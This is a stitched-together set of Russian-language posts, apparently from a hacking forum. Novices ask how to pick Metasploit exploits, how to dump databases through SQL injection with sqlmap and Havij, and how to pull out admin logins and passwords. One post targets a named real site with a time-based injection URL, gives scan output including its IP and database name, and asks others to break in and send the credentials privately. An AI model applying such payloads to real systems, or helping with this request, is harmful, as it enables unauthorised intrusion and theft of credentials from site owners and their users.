спасибо за ответ. как я понял по ссылке список уязвимость. но как человек имеющий базовые знания но первый раз сталкивающийся с этим, можете в качестве примеров описать коротко по шагам как это применять, по примерам я пойму не совсем чайник.
и вам спасибо за ответ, по ссылке кнопка скачать.. дальше что делать как применять, пожалуйста не бросайте, объясните как надо я пойму.. очень нужны файлы!
Приветствую! Как в Metasploit подобрать нужный эксплоит? Руками тыкать ужасно долго и нудно. Есть ли альтернатива?
хз, к примеру запрос select * from article order by id limit 100,25 как мне составить запрос на выборку из другой таблици?
что мне подсазали? мне написали пару слов вот я спросил как составить запрос, так как мало представляю о том что можно вставить после лимита ПС: рдот лежит уже давно
phpMyAdmin/scripts/setup.php.Что можете посоветовать? http://s020.radikal.ru/i723/1510/c2/4993371de002.png
Burp нашел такие sql: http://i.shotnes.com/a/25/kd5e0ash.k05_562d2001b6373.png как с них базу снять? sqlmap пишет все параметны not injectable,sqldumper пишет просто mysql
нашел SQL инъекцию, попробовал через Havij , не отображает название столбцов баз данных. скрин-шот: http://i.imgur.com/j2yMOWB.png Сама инъекция: Вопрос, что можно сделать.
спасибо, вот только не вижу, что мы вывели данным запросом. как вывести логин / пароль id1 т.е администратора
http://stop-obman.ru/organizations.html?rid=1+WAITFOR+DELAY+'0:0:25'-- Target: http://stop-obman.ru/organizations.html?rid=1 Host IP: 217.12.206.101 Web Server: nginx Powered-by: PHP/5.3.3 DB Server: MySQL error based Resp. Time(avg): 889 ms Sql Version: 5.1.73 Current DB: raferti_stopobman Host Name: rafer685.vds Compile OS: redhat-linux-gnu Installation dir: /usr/
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0:0:25'--')) AND (rl_orgs.country_id = '1')) AND (rl_orgs.subject=t.id)) AND (t.' at line 1. The SQL statement executed was: SELECT COUNT(DISTINCT `t`.`id`) FROM `subject` `t` LEFT OUTER JOIN `organization` `rl_orgs` ON (`rl_orgs`.`subject`=`t`.`id`) WHERE (((((type='1') AND (rl_orgs.region = '1 WAITFOR DELAY '0:0:25'--')) AND (rl_orgs.country_id = '1')) AND (rl_orgs.subject=t.id)) AND (t.enable=1)) если получится, скинь логин/пароль в лс